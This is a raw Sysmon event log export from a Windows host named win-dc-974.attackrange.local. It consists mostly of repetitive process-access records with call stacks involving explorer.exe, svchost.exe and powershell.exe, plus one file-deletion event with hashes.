22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+170f46|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}57847236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001694586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.152{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10cf6cd1.TMPMD5=36F22A7F515FAF9295F898DD3784E5FF,SHA256=B731C436E20A5F157836F5B783A3700620CA1FD09C9BB6DFA6B7655BE548D3CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.145{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.113{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.113{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 